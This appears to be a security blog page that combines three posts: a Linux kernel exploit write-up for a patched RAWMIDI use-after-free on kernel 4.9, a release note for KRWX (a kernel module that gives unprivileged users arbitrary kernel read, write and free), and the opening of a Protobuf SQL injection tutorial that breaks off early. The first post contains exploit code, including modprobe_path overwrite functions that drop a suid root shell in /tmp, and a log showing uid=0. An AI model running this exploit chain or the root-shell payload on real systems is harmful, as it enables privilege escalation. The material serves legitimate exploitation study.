As said before, this is a similar approach to the “Changelogs” method. The concept is pretty simple: clone the GitHub repository and search for juicy keywords in the commit history. You can do that with the following commands:

git clone git://
cd linux-stable
git checkout -f <TAG>   # e.g. git checkout -f v4.9.316
git log > ../git.log

In that way, you can do the same thing as before on the git.log file. The big downside, however, is that the file is huge and takes more time to work through (11,429,573 lines on 4.9.316). That’s the reason why I prefer the “Changelog” method.

Hunt for a good vulnerability

I was searching for a Use-After-Free vulnerability and I started to look for it in all the mentioned resources: BugZilla, SyzBot, changelogs and git history. I wrote the candidates down in a table with a summary description in order to further analyze them later on. I started to dig into a few of them, viewing their patch and source code in order to understand reachability, compile dependencies and exploitability. I stumbled upon an interesting one: a vulnerability in the RAWMIDI interface (commit c13f1463d84b86bedb664e509838bef37e6ea317). I discovered it with the “Changelog” method, by searching for the “UAF” keyword and reading the previous and next five lines: grep -A5 -B5 UAF *. After looking at its behaviour, I was convinced to go with that vulnerability: a Use-After-Free triggered by a race condition.

RAWMIDI interface

Before facing the vulnerability, let’s see a few important things needed to follow this write-up. The vulnerable driver is exposed as a character device in /dev/snd/midiC0D* (or a similar name based on the platform) and depends on CONFIG_SND_RAWMIDI. It exposes the following file operations:

static const struct file_operations snd_rawmidi_f_ops = {
	.owner =	THIS_MODULE,
	.read =		snd_rawmidi_read,
	.write =	snd_rawmidi_write,
	.open =		snd_rawmidi_open,
	.release =	snd_rawmidi_release,
	.llseek =	no_llseek,
	.poll =		snd_rawmidi_poll,
	.unlocked_ioctl =	snd_rawmidi_ioctl,
	.compat_ioctl =	snd_rawmidi_ioctl_compat,
};

The ones we are interested in are open, write and unlocked_ioctl.


The open (snd_rawmidi_open) operation allocates everything needed to interact with the device; what we need to know is that it initially allocates snd_rawmidi_runtime->buffer with GFP_KERNEL and a size of 4096 (PAGE_SIZE) bytes. This is the snd_rawmidi_runtime struct:

struct snd_rawmidi_runtime {
	struct snd_rawmidi_substream *substream;
	unsigned int drain: 1,	/* drain stage */
		     oss: 1;	/* OSS compatible mode */
	/* midi stream buffer */
	unsigned char *buffer;	/* buffer for MIDI data */
	size_t buffer_size;	/* size of buffer */
	size_t appl_ptr;	/* application pointer */
	size_t hw_ptr;		/* hardware pointer */
	size_t avail_min;	/* min avail for wakeup */
	size_t avail;		/* max used buffer for wakeup */
	size_t xruns;		/* over/underruns counter */
	/* misc */
	spinlock_t lock;
	wait_queue_head_t sleep;
	/* event handler (new bytes, input only) */
	void (*event)(struct snd_rawmidi_substream *substream);
	/* defers calls to event [input] or ops->trigger [output] */
	struct work_struct event_work;
	/* private data */
	void *private_data;
	void (*private_free)(struct snd_rawmidi_substream *substream);
};


After everything has been allocated by the open operation, we can write into the file descriptor, e.g. write(fd, &buf, 10). That will fill 10 bytes of snd_rawmidi_runtime->buffer and, using snd_rawmidi_runtime->appl_ptr, it will remember the offset at which to resume writing later.
In order to write into that buffer, the driver makes the following calls: snd_rawmidi_write => snd_rawmidi_kernel_write1 => copy_from_user


The snd_rawmidi_ioctl is responsible for handling IOCTL commands, and the one we are interested in is SNDRV_RAWMIDI_IOCTL_PARAMS, which calls snd_rawmidi_output_params with user-controllable parameters:

int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
			      struct snd_rawmidi_params * params)
{
	// [..] few checks
	if (params->buffer_size != runtime->buffer_size) {
		newbuf = kmalloc(params->buffer_size, GFP_KERNEL); //[1]
		if (!newbuf)
			return -ENOMEM;
		oldbuf = runtime->buffer;
		runtime->buffer = newbuf; // [2]
		runtime->buffer_size = params->buffer_size;
		runtime->avail = runtime->buffer_size;
		runtime->appl_ptr = runtime->hw_ptr = 0;
		kfree(oldbuf); //[3]
	}
	// [..]
}

This IOCTL is crucial for this vulnerability. With this command it’s possible to re-size the internal buffer to an arbitrary value: a new buffer is allocated [1] and swapped in for the old one [2], which is then freed [3].

Vulnerability Analysis

The vulnerability has been patched by commit “c13f1463d84b86bedb664e509838bef37e6ea317”, which introduced a reference counter on the targeted vulnerable buffer. In order to understand where the vulnerability lived, it’s worth looking at the patch:

diff --git a/include/sound/rawmidi.h b/include/sound/rawmidi.h
index 5432111c8761..2a87128b3075 100644
--- a/include/sound/rawmidi.h
+++ b/include/sound/rawmidi.h
@@ -76,6 +76,7 @@ struct snd_rawmidi_runtime {
        size_t avail_min;       /* min avail for wakeup */
        size_t avail;           /* max used buffer for wakeup */
        size_t xruns;           /* over/underruns counter */
+       int buffer_ref;         /* buffer reference count */
        /* misc */
        spinlock_t lock;
        wait_queue_head_t sleep;
diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c
index 358b6efbd6aa..481c1ad1db57 100644
--- a/sound/core/rawmidi.c
+++ b/sound/core/rawmidi.c
@@ -108,6 +108,17 @@ static void snd_rawmidi_input_event_work(struct work_struct *work)
+/* buffer refcount management: call with runtime->lock held */
+static inline void snd_rawmidi_buffer_ref(struct snd_rawmidi_runtime *runtime)
+       runtime->buffer_ref++;
+static inline void snd_rawmidi_buffer_unref(struct snd_rawmidi_runtime *runtime)
+       runtime->buffer_ref--;
 static int snd_rawmidi_runtime_create(struct snd_rawmidi_substream *substream)
        struct snd_rawmidi_runtime *runtime;
@@ -654,6 +665,11 @@ int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
                if (!newbuf)
                        return -ENOMEM;
+               if (runtime->buffer_ref) {
+                       spin_unlock_irq(&runtime->lock);
+                       kfree(newbuf);
+                       return -EBUSY;
+               }
                oldbuf = runtime->buffer;
                runtime->buffer = newbuf;
                runtime->buffer_size = params->buffer_size;
@@ -962,8 +978,10 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
        long result = 0, count1;
        struct snd_rawmidi_runtime *runtime = substream->runtime;
        unsigned long appl_ptr;
+       int err = 0;
        spin_lock_irqsave(&runtime->lock, flags);
+       snd_rawmidi_buffer_ref(runtime);
        while (count > 0 && runtime->avail) {
                count1 = runtime->buffer_size - runtime->appl_ptr;
                if (count1 > count)
@@ -982,16 +1000,19 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
                if (userbuf) {
                        spin_unlock_irqrestore(&runtime->lock, flags);
                        if (copy_to_user(userbuf + result,
-                                        runtime->buffer + appl_ptr, count1)) {
-                               return result > 0 ? result : -EFAULT;
-                       }
+                                        runtime->buffer + appl_ptr, count1))
+                               err = -EFAULT;
                        spin_lock_irqsave(&runtime->lock, flags);
+                       if (err)
+                               goto out;
                result += count1;
                count -= count1;
+ out:
+       snd_rawmidi_buffer_unref(runtime);
        spin_unlock_irqrestore(&runtime->lock, flags);
-       return result;
+       return result > 0 ? result : err;
 long snd_rawmidi_kernel_read(struct snd_rawmidi_substream *substream,
@@ -1262,6 +1283,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
                        return -EAGAIN;
+       snd_rawmidi_buffer_ref(runtime);
        while (count > 0 && runtime->avail > 0) {
                count1 = runtime->buffer_size - runtime->appl_ptr;
                if (count1 > count)
@@ -1293,6 +1315,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
        count1 = runtime->avail < runtime->buffer_size;
+       snd_rawmidi_buffer_unref(runtime);

Two functions were added: snd_rawmidi_buffer_ref and snd_rawmidi_buffer_unref. They are respectively used to take and drop a reference to the buffer via snd_rawmidi_runtime->buffer_ref while reading (snd_rawmidi_kernel_read1) or writing (snd_rawmidi_kernel_write1) that buffer. But why was this needed? Because the read and write operations handled by snd_rawmidi_kernel_write1 and snd_rawmidi_kernel_read1 temporarily release the runtime lock while copying from/to userspace, using spin_unlock_irqrestore [1] / spin_lock_irqsave [2], giving a small race window in which the object can be modified during the copy_from_user call:

static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream, const unsigned char __user *userbuf, const unsigned char *kernelbuf, long count) {
	// [..]
			spin_unlock_irqrestore(&runtime->lock, flags); // [1]
			if (copy_from_user(runtime->buffer + appl_ptr,
					   userbuf + result, count1)) {
				spin_lock_irqsave(&runtime->lock, flags);
				result = result > 0 ? result : -EFAULT;
				goto __end;
			}
			spin_lock_irqsave(&runtime->lock, flags); // [2]
	// [..]
}


If a concurrent thread re-allocates runtime->buffer using the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl, that thread can take the lock at spin_lock_irq [1] (which has been left unlocked in the small race window given by snd_rawmidi_kernel_write1) and free that buffer [2], making it possible to re-allocate an arbitrary object and write into it. Also, the kmalloc [3] in snd_rawmidi_output_params is called with params->buffer_size, which is totally user-controllable.

int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
			      struct snd_rawmidi_params * params)
{
	// [..]
	if (params->buffer_size != runtime->buffer_size) {
		newbuf = kmalloc(params->buffer_size, GFP_KERNEL); // [3]
		if (!newbuf)
			return -ENOMEM;
		spin_lock_irq(&runtime->lock); // [1]
		oldbuf = runtime->buffer;
		runtime->buffer = newbuf;
		runtime->buffer_size = params->buffer_size;
		runtime->avail = runtime->buffer_size;
		runtime->appl_ptr = runtime->hw_ptr = 0;
		kfree(oldbuf); // [2]
	}
	// [..]
}

What happens if, while a thread is writing into the buffer with copy_from_user, another thread frees that buffer using the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl and reallocates a new arbitrary one? The object is replaced with a new one and copy_from_user will continue writing into another object (the “victim object”), corrupting its values => Use-After-Free (write).

The really good part about this vulnerability is the “freedom” you can have:

  • It’s possible to call kmalloc with an arbitrary size (and this will be the freed object that we are going to replace to cause a UAF), which means that we can target our favourite slab cache (based on what we need, of course)
  • We can write as much as we want into the buffer with the write syscall

Extend the Race Time Window

We know we have a small race window of a few instructions while copying data from userland to the kernel, as explained before, but the great news is that we have a copy_from_user that can be suspended arbitrarily by handling the page fault in user-space! Since I was exploiting the vulnerability on a 4.9 kernel (4.9.223), where userfaultfd is still usable by unprivileged users (unlike >= 5.11, where it is restricted by default), we can use it to extend our race window and have the necessary time to re-allocate the buffer!

Exploitation Plan

We stated that we are going to use the userfaultfd technique to extend the time window. If you are new to this technique, it is well explained here, in this video (you can use subtitles) and here. To summarize: you can handle page faults from user-land, temporarily blocking kernel execution while the page fault is being handled. If we mmap a block of memory with the MAP_ANONYMOUS flag, the memory will be demand-zero paged, meaning that it is not yet backed by a physical page, and we can intercept its first access via userfaultfd.
The idea behind using this technique is:

  • Initialize runtime->buffer with open => This will allocate the buffer with size 4096 (which lands in kmalloc-4096)
  • Send the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl command in order to re-allocate the buffer with our desired size (e.g. 30 will land in kmalloc-32)
  • Allocate a demand-zero paged region with mmap (MAP_ANON) and initialize userfaultfd to handle its page faults
  • write to the rawmidi file descriptor using our previously allocated mmaped memory => This will trigger the userland page fault in copy_from_user
  • While the kernel thread is suspended waiting for the userland page fault, we can send SNDRV_RAWMIDI_IOCTL_PARAMS again in order to free the current runtime->buffer
  • We allocate an object in, for example, kmalloc-32, and if we sprayed that cache beforehand it will take the place of the previously freed runtime->buffer
  • We release the page fault from userland and copy_from_user will continue writing its data (totally under user control) into the newly allocated object

With this primitive, we can forge arbitrary objects with arbitrary size (specified in the write syscall), arbitrary content, arbitrary offset (since we can trigger userfaultfd between two pages, as demonstrated later on) and in an arbitrary cache (we can control the allocation size in the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl).
As you can deduce, we have a really great and powerful primitive!

Information Leak

Victim Object

We are going to use what we explained in the “Exploitation Plan” section to leak an address that we will re-use to obtain an arbitrary write. Since we can choose which cache to trigger the UAF in (and that’s gold from an exploitation point of view), I chose to leak the shm_file_data->ns pointer, which points to init_ipc_ns in the kernel .data section and lives in kmalloc-32 (I also used the same function to spray the kmalloc-32 cache):

void alloc_shm(int i)
{
    int shmid[0x100]     = {0};
    void *shmaddr[0x100] = {0};

    shmid[i] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);
    if (shmid[i] < 0) errExit("shmget");

    shmaddr[i] = (void *)shmat(shmid[i], NULL, SHM_RDONLY);
    if (shmaddr[i] == (void *)-1) errExit("shmat");
}

From that pointer, we will deduce the pointer of modprobe_path in order to use that technique later to elevate our privileges.


struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

struct msg_msgseg {
	struct msg_msgseg *next;
	/* the next part of the message follows immediately */
};

In order to leak that address, however, we have to compromise some other object in kmalloc-32, ideally a length field that would cause a read past its own object. For that, msg_msg is our perfect match, because it has a length field in msg_msg->m_ts and it can be allocated in almost any cache from kmalloc-32 up to kmalloc-4096, with just one downside: the minimum allocation for the msg_msg struct itself is 48 bytes (sizeof(struct msg_msg)), so it lands at minimum in kmalloc-64.
If you want to read more about this structure, you can check out the Fire of Salvation writeup, Wall Of Perdition, and the kernel source code.
However, when a message is sent using msgsnd with a size greater than DATALEN_MSG (((size_t)PAGE_SIZE-sizeof(struct msg_msg)), i.e. 4096-48), a segment (or multiple segments if needed) is allocated, and the message is split between the msg_msg (the payload starts just after the struct header) and the msg_msgseg, with the total size of the message stored in msg_msg->m_ts.

In order to allocate our target object in kmalloc-32 we have to send a message with size: ((4096 - 48) + 10).

  • The msg_msg structure will be allocated in kmalloc-4096 and the first (4096 - 48) bytes will be written into the msg_msg structure.
  • To allocate the remaining 10 bytes, a segment msg_msgseg will be allocated in kmalloc-32

With these conditions, we can forge the msg_msg structure in kmalloc-4096, overwriting its m_ts value with our UAF, and with msgrcv we can receive a message that will contain values past our segment allocated in kmalloc-32 (including our targeted init_ipc_ns pointer).

Dealing with offsets

However, we want to overwrite the m_ts value without overwriting anything else in the msg_msg structure; how can we do that?
If you remember, I said we can overwrite chunks with arbitrary size, content and offset. If we mmap a region of size PAGE_SIZE * 2 (two pages) and handle the page fault only for the second page, we can start writing into the original runtime->buffer and trigger the page fault exactly when the copy reaches the msg_msg->m_ts offset (0x18). Now that the kernel thread is blocked, it’s possible to replace the object with msg_msg, and when copy_from_user resumes it will write the remaining bytes exactly at the msg_msg->m_ts offset. The size we write into the file descriptor is (0x18 + 0x2), since the first 0x18 bytes are used to land at the exact offset and the 2 remaining bytes write 0xffff into msg_msg->m_ts. The concept is also explained in the following picture:

Now, from the message received via msgrcv, we can retrieve the init_ipc_ns pointer from shm_file_data, deduce the modprobe_path address by calculating its offset, and proceed with the arbitrary write phase.

Arbitrary Write

In order to write to arbitrary locations we use the same userfaultfd technique described above, but instead of targeting msg_msg we use the Vectored I/O (pipe + iovec) primitive. This primitive was fixed in kernel 4.13 with the copyin and copyout wrappers, which add an access_ok check. The technique was widely used in exploiting the Android Binder CVE-2019-2215 and is well detailed here and here.

The idea is to trigger the UAF once again but targeting the iovec struct:

struct iovec
{
	void __user *iov_base;	/* BSD uses caddr_t (1003.1g requires void *) */
	__kernel_size_t iov_len; /* Must be size_t (1003.1g) */
};

The minimum heap allocation for iovec occurs with sizeof(struct iovec) * 9, i.e. 16 * 9 (144), which lands in kmalloc-192 (with fewer vectors the array is kept on the stack). However, I chose to allocate 13 vectors using readv to make the object land in kmalloc-256.

    int pipefd[2];
    // [...]
    struct iovec iov_read_buffers[13] = {0};
    char read_buffer0[0x100];
    memset(read_buffer0, 0x52, 0x100);
    iov_read_buffers[0].iov_base = read_buffer0;
    iov_read_buffers[0].iov_len= 0x10;
    iov_read_buffers[1].iov_base = read_buffer0;
    iov_read_buffers[1].iov_len= 0x10;
    iov_read_buffers[8].iov_base = read_buffer0;
    iov_read_buffers[8].iov_len= 0x10;
    iov_read_buffers[12].iov_base = read_buffer0;
    iov_read_buffers[12].iov_len= 0x10;

        ssize_t readv_res = readv(pipefd[0], iov_read_buffers, 13); // 13 * 16 = 208 => kmalloc-256

readv is a blocking call that keeps the object alive (not freed) in the kernel, so that we can corrupt it with our UAF and have it re-used later with our arbitrarily modified content. If we corrupt the iov_base of an iovec structure, we can write to arbitrary kernel addresses with a write syscall, since it uses the unsafe __copy_from_user (same as copy_from_user but without checks).

Our idea is:

  • Resize runtime->buffer with SNDRV_RAWMIDI_IOCTL_PARAMS so that it lands in kmalloc-256, using a size greater than 192
  • write into the file descriptor specifying a demand-zero paged memory region (MAP_ANON) so that copy_from_user will stop its execution waiting for our user-land page fault handler
  • While the kernel thread is waiting, free the buffer using the re-size ioctl command SNDRV_RAWMIDI_IOCTL_PARAMS again
  • Allocate the iovec struct using readv; it will replace the previously freed runtime->buffer
  • Resume the kernel execution by releasing the page fault handler. Now copy_from_user will write into the iovec structure and we will overwrite iov[1].iov_base with the modprobe_path address.

Now, in order to overwrite the modprobe_path value, we just have to write our arbitrary content into the pipe’s write end using the write syscall. In the released exploit I overwrote the second iov entry (iov[1]) using the same adjacent-pages technique described before. However, it’s also possible to directly overwrite the first entry, iov[0].iov_base.

Nice! Now we have overwritten modprobe_path with /tmp/x and.. it’s time to pop a shell!

modprobe_path & uid=0

If you are not familiar with modprobe_path, I suggest checking out Exploiting timerfd_ctx Objects In The Linux Kernel and the man page.
To summarize, modprobe_path is a global variable with a default value of /sbin/modprobe, used by call_usermodehelper_exec to execute a user-space program when a binary with an unknown header is executed.
Since we have overwritten modprobe_path with /tmp/x, when a file with an unknown header is executed, our controlled script is executed as root.

These are the exploit functions that prepare and later execute a suid shell:

void prep_exploit(){
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'touch /tmp/pwneed' >> /tmp/x");
    system("echo 'chown root: /tmp/suid' >> /tmp/x");
    system("echo 'chmod 777 /tmp/suid' >> /tmp/x");
    system("echo 'chmod u+s /tmp/suid' >> /tmp/x");
    system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/nnn");
    system("chmod +x /tmp/x");
    system("chmod +x /tmp/nnn");
}

void get_root_shell(){
    system("/tmp/nnn 2>/dev/null");
    system("/tmp/suid 2>/dev/null");
}

int main(){
	// [..] exploit stuff
	get_root_shell(); // pop a root shell
}

The exploit simply creates the /tmp/x script, which will chown root and set the suid bit on a file dropped at /tmp/suid, and creates a file with an unknown header (/tmp/nnn) whose execution triggers /tmp/x as root via call_usermodehelper_exec. After that, running /tmp/suid grants root privileges and spawns a root shell.


/ $ uname -a                                   
Linux (none) 4.9.223 #3 SMP Wed Jun 1 23:15:02 CEST 2022 x86_64 GNU/Linux 
/ $ id
uid=1000(user) gid=1000 groups=1000
/ $ /main 
[*] Starting exploitation ..
[+] userfaultfd registered
[*] First write to init substream..
[*] Resizing buffer_size to 4096 ..
[*] snd_write triggered (should fault) 
[*] Freeing buf using SNDRV_RAWMIDI_IOCTL_PARAMS
[+] Page Fault triggered for 0x5551000!
[*] Replacing freed obj with msg_msg .
[*] Waiting for userfaultd to finish ..
[*] Page fault thread terminated
[+] Page fault lock released
[+] init_ipc_ns @0xffffffff81e8d560
[+] calculated modprobe_path @0xffffffff81e42a00
[+] Starting the arbitrary write phase ..
[*] Closing and reopening re-opening rawmidi fd ..
[+] userfaultfd registered
[*] First write to init substream..
[*] Resizing buffer_size to land into kmalloc-256 ..
[*] snd_write triggered (should fault) 
[+] Page Fault triggered for 0x7771000!
[*] Waiting for readv ..
[*] Page fault thread terminated
[+] Page fault lock released
[*] Writing into the pipe ..
[*] write = 24
[+] enjoy your r00t shell [:
/ # id
uid=0(root) gid=0 groups=1000
/ #


I illustrated my experience of finding a public vulnerability using public resources to practise some Linux kernel exploitation. Once I identified a good candidate, I developed an exploit for a 4.9 kernel, achieving arbitrary read and write. With these primitives, a root shell was spawned.

You can find the whole exploit here:



KRWX: Kernel Read Write Execute

12 March 2022 at 15:41


Github project:

During the last few months/year I was studying and approaching the Kernel Exploitation subject, and during this journey I developed a few tools that assisted me (and still assist me) in better understanding specific topics. Today I want to release my favourite one: KRWX (Kernel Read Write Execute). It is a simple LKM (Linux Kernel Module) that lets you play with kernel memory and allocate and free kernel objects directly from user-land!


The main goal of this tool is to use kernel functions from userland (from C code) in order to avoid slower kernel debugging and the development of kernel modules to demonstrate specific vulnerabilities (instead, you can emulate them with the provided IOCTLs). It can also assist the exploitation phase.
These are the project's main features (all accessible by a low-privileged user from user-land):

  • Read and write into kernel memory
  • Read entire blocks of memory
  • Arbitrary allocate objects directly calling kmalloc
  • Arbitrary kfree objects (and also free arbitrary addresses, if you want)
  • Allocate/free multiple objects
  • Log every copy_[from|to]_user/ kmalloc/kfree called by the KRWX module through hooking (readable from dmesg).

Mainly, a more powerful read and write primitive :]


Initially I wrote this module to study the SLUB memory allocator in Linux by easily allocating, freeing and re-allocating arbitrary chunks from a userland process. That naturally led me to also study some exploitation techniques which, with this module, I found much easier to understand, since you can play with kernel memory as if you were the god of your system. Then I started to use it heavily for multiple purposes, and that's why I'm sharing it.


These are some exported functions:

  • void* kmalloc(size_t arg_size, gfp_t flags) -> Allocate a chunk with specific size and flag options.
  • int kfree(void* address) -> Free arbitrary chunks by their address (also, you can free arbitrary memory).
  • unsigned long int kread64(void* address) -> Read 8 bytes of memory at address.
  • int kwrite64(void* address, uint64_t value) -> Write 8 bytes specified by value into address.
  • void read_memory(void* start_address, size_t size) -> Read size amount of memory starting from start_address.

And, since one of my favourite hobbies is overengineering and I'm too lazy to write loops every time:

  • void multiple_kmalloc(void** array, uint32_t n_objs, uint32_t size) -> Allocate n_objs number of objects with specified size and return addresses in array.
  • void multiple_kfree(void** array, uint64_t to_free[], uint64_t to_free_size) -> Free the chunks of array whose indexes are specified in to_free (to_free_size is the length of the to_free array).

If you're interested in the source code, feel free to check out the github project.


Allocate, free and read arbitrary chunks

You can find the full source code in example/01.c. Here follow some snippets and a short walkthrough.

First, include the external library and call its initialization function (init_krwx):

#include "./lib/krwx.h"

int main(){
    init_krwx();
    // ... play with kernel memory here
    return 0;
}

Then, 10 chunks of size 256 are allocated using multiple_kmalloc, and the memory of the 7th chunk is read using read_memory after writing 0x4141414141414141 into its first bytes:

void* chunks[10];
multiple_kmalloc(chunks, 10, 256);
kwrite64(chunks[7], 0x4141414141414141);
read_memory(chunks[7], 0x10);

The indexes 3, 4 and 7 of the chunks array are freed using multiple_kfree:

uint64_t to_free[] = {3, 4, 7};
multiple_kfree(chunks, to_free, ( sizeof(to_free) / sizeof(uint64_t) ) );

Once they are freed, new chunks of the same size are allocated and initialized with 0x4343434343434343, and the memory of the freed 7th chunk is displayed using read_memory again:

kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
read_memory(chunks[7], 0x10);

The result is:

[*] Allocating 10 chunks with size 256
[*] Allocated @0xffffffc00503b900
[*] Allocated @0xffffffc00503b600
[*] Allocated @0xffffffc00503b100
[*] Allocated @0xffffffc00503bc00
[*] Allocated @0xffffffc00503b400
[*] Allocated @0xffffffc00503b000
[*] Allocated @0xffffffc00503b500
[*] Allocated @0xffffffc00503b800
[*] Allocated @0xffffffc00503ba00
[*] Allocated @0xffffffc00503bd00
0xffffffc00503b800:     0x4141414141414141 0xffffffc0001a8928
[*] Freeing @0xffffffc00503bc00
[*] Freeing @0xffffffc00503b400
[*] Freeing @0xffffffc00503b800
0xffffffc00503b800:     0x4343434343434343 0xffffffc0001a8928

With a few lines of code we have demonstrated how our 7th chunk was replaced by a new one after being freed (read_memory targeted chunks[7]).
As simple as it is, this example was written for demonstration purposes.


To simulate a UAF scenario, a few lines of code are enough:

void* chunk = kmalloc(<SIZE>, <FLAGS>);
kfree(chunk);
// Allocate your target chunk
// Simulate UAF using k[write|read]64()

For example, if we want to simulate an attack scenario where we want to replace our vulnerable freed chunk with a target object (for example an iovec struct) we can allocate a chunk with kmalloc and later kfree it just before allocating the target structure:

// Allocate the vulnerable object
void* chunk = kmalloc(150, _GFP_KERN);
// Prepare the target object
struct iovec iov[10] = {0};
char iov_buf[0x100];
iov[0].iov_base = iov_buf;
iov[0].iov_len = 0x1000;
iov[1].iov_base = iov_buf;
iov[1].iov_len = 0x1337;
int pp[2];
pipe(pp);
if (fork() == 0) {
    kfree(chunk); // Freeing the chunk just before allocating the iovec
    readv(pp[0], iov, 10); // allocate iovec and block (keeping the object in the kernel)
    exit(0);
}
sleep(1); // Give time to the child process
read_memory(chunk, 0x40);

Then, with read_memory we can display the block of memory we are interested in and, as you can see from the following output, our arbitrarily allocated/freed object has been replaced with the target object:

Allocated chunk @0xffffffc0052c5a00
0xffffffc0052c5a00:     0x0000007fd311ff58 0x0000000000001000
0xffffffc0052c5a10:     0x0000007fd311ff58 0x0000000000001337
0xffffffc0052c5a20:     0x0000000000000000 0x0000000000000000
0xffffffc0052c5a30:     0x0000000000000000 0x0000000000000000

Instead of just printing the content, you can simulate a UAF read/write using k[read|write]64 and play with it.

The full code of this example can be found in client/example/02.c


To compile the module, change the K variable in the Makefile to the root directory of your compiled kernel, compile with make, then insmod it.


Personally, I used it to study the SLUB allocator and to understand UAF, heap overflows, double free, userfaultfd and some hardening features in the kernel, but it can assist the exploitation phase too. Blog posts on some kernel vulnerabilities and their attack methodologies will follow in the coming months, and this module will come in useful to demonstrate them. So stay tuned and enjoy!

PS. The "Execute" part of the name refers to a future implementation to control pc/rip.


🇬🇧 Tortellini in Brodobuf



Many developers believe that serializing traffic makes a web application more secure, as well as faster. That would be easy, right? The truth is that, regardless of how data is exchanged between client and server, security implications remain if the backend code does not adopt adequate defensive measures. In this article we will show how serialization cannot stop an attacker if the web application is vulnerable at its root. The application we tested was vulnerable to SQL injection; we will show how to exploit it when communications are serialized with Protocol Buffers, and how to write a SQLMap tamper script for it.


Hello friends… Hello friends… Here are 0blio and MrSaighnal; we didn't want to leave all the space to our brother last, so we decided to do some hacking. During an activity on a web application we tripped over a weird target behaviour: during HTTP interception the data appeared to be encoded in base64, but after decoding the response we noticed the data was in a binary format. Thanks to some information leakage (and also by taking a look at the application/grpc header) we understood the application used a Protocol Buffers (Protobuf) implementation. Looking around the internet we found little information regarding Protobuf and its exploitation methodology, so we decided to document our analysis process here. The penetration testing activity was under NDA, so in order to demonstrate how Protobuf works we developed an exploitable web application (APTortellini copyrighted 😊).

Protobuf primer

Protobuf is a data serialization format released by Google in 2008. Unlike formats such as JSON and XML, Protobuf is not human friendly, since data is serialized in a binary format and sometimes encoded in base64. Protobuf was developed to improve communication speed when used in conjunction with gRPC (more on that in a moment). It is a data exchange format originally developed for internal use and later released as an open source project (partially under the Apache 2.0 license). Protobuf can be used by applications written in various programming languages, such as C#, C++, Go, Objective-C, Javascript, Java, etc. It is used, among other things, in combination with HTTP and RPC (Remote Procedure Calls) for local and remote client-server communication, in particular for the description of the interfaces needed for this purpose. The protocol suite is also known by the acronym gRPC.

For more information regarding Protobuf our best advice is to read the official documentation.

Step 1 - Playing with Protobuf: Decoding

Okay, so… our application comes with a simple search form that allows searching for products within the database.


Searching for “tortellini”, we obviously get that the amount is 1337 (badoom tsss):


Inspecting the traffic with Burp we notice how search queries are sent towards the /search endpoint of the application:


And that the response looks like this:


At first glance, it might seem that the messages are simply base64 encoded. Trying to decode them, though, we noticed that the traffic is in a binary format:



Inspecting it with xxd we can get a bit more information.


To make it easier for us to decode base64 and deserialize Protobuf, we wrote this simple script:


import base64
from subprocess import run, PIPE

while 1:
    try:
        decoded_bytes = base64.b64decode(input("Insert string: "))[5:]
        process = run(['protoc', '--decode_raw'], stdout=PIPE, input=decoded_bytes)
        print(process.stdout.decode("utf-8").strip())
    except KeyboardInterrupt:
        break
The script takes an encoded string as input, decodes it from base64, strips away the first 5 bytes (the gRPC message prefix: a 1-byte compression flag followed by a 4-byte big-endian message length) and finally uses protoc (Protobuf's own compiler/decompiler) with --decode_raw to deserialize the message.
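The 5-byte prefix can be reproduced with a few lines of Python. This is a sketch assuming the 5 leading bytes are the standard gRPC frame (a compression flag plus a big-endian length); the message bytes are illustrative:

```python
import base64
import struct

# gRPC framing: 1-byte compression flag + 4-byte big-endian length + message
message = b"\x0a\x0atortellini\x10\x00"  # an illustrative serialized message
frame = b"\x00" + struct.pack(">I", len(message)) + message
encoded = base64.b64encode(frame).decode()

# What the decoding script does: base64-decode, then drop the 5-byte prefix
assert base64.b64decode(encoded)[5:] == message
```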

Running the script on both our request data and the returned response data, we get the following output:


As we can see, the request message contains two fields:

  • Field 1: String to be searched within the database.
  • Field 2: An integer always equal to 0.

The response structure, instead, includes a series of messages containing the objects found and their respective amounts.
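Those two fields can also be verified by walking the raw wire format by hand. Below is a minimal sketch of a Protobuf wire-format walker (it only handles varints and length-delimited fields with lengths under 128 bytes, which is enough for these messages; protoc --decode_raw does the same job properly):

```python
def walk(buf):
    """Decode top-level Protobuf fields: varints (wire type 0) and
    length-delimited fields (wire type 2) with single-byte lengths."""
    i, fields = 0, []
    while i < len(buf):
        tag = buf[i]; i += 1
        number, wire = tag >> 3, tag & 7
        if wire == 0:  # varint
            value, shift = 0, 0
            while True:
                b = buf[i]; i += 1
                value |= (b & 0x7F) << shift
                shift += 7
                if not b & 0x80:
                    break
            fields.append((number, value))
        elif wire == 2:  # string / bytes / embedded message
            length = buf[i]; i += 1
            fields.append((number, buf[i:i + length]))
            i += length
    return fields

# field 1 = "tortellini" (string), field 2 = 0 (varint)
print(walk(b"\x0a\x0atortellini\x10\x00"))  # [(1, b'tortellini'), (2, 0)]
```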

Once we understood the structure of the messages and their content, the challenge is to write a definition file (.proto) that allows us to get the same kind of output.

Step 2 - Suffering with Protobuf: Encoding

After spending some time reading the Python documentation, and after some trial and error, we rewrote a message definition similar to the one our target application should use.

syntax = "proto2";
package searchAPI;

message Product {

        message Prod {
                required string name = 1;
                optional int32 quantity = 2;
        }

        repeated Prod product = 1;
}

The .proto file can be compiled with the following command:

protoc -I=. --python_out=. ./search.proto

